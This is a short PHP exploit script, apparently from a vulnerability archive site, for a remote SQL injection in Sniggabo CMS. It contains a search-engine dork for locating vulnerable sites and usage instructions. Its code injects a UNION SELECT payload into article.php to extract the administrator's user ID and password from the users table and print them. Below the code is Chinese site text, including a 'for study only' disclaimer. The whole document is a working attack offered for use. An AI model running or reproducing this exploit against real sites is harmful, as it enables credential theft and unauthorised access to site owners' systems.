<?php print_r(' ################################################ Sniggabo CMS - Remote SQL Injection Exploit Date: 11.06.2009 Vulnerability discovered by: Lidloses_Auge Exploit coded by: Lidloses_Auge Homepage: http://www.novusec.com Greetz to: -=Player=- , Suicide, enco, Palme, GPM, karamble, Free-Hack Admin Panel: [target]/admin/login.php Dork: "powered by Sniggabo CMS" inurl:article.php?id Use: php '.$argv[0].' http://www.site.com ################################################ '); $url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--"; $src = file_get_contents($url); $data = split("::",$src); echo "Admin: $data[1]\nPassword: $data[2]\n"; ?> # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论